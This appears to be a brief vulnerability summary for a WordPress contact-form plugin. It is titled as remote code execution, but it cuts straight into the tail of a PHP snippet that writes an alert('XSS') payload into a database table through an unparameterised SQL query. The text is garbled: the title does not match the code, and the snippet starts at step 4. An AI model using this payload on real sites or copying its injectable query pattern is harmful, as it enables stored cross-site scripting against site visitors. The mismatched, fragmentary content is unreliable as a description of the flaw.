# Vulnerability Summary: Spam Project for Contact Form 7 Remote Code Execution (RCE) ### Overview * **Vulnerability Name**: Spam Project for Contact Form 7 alert("XSS")'; // 4. Define the SQL query $sql = "INSERT INTO $table_name (id, form_id, created_at, updated_at, status, data) VALUES (1, 1, NOW(), NOW(), 'complete', '$payload')"; // 5. Execute the query global $wpdb; $wpdb->query($sql); // 6. Output the result echo "Data inserted successfully"; ?> ```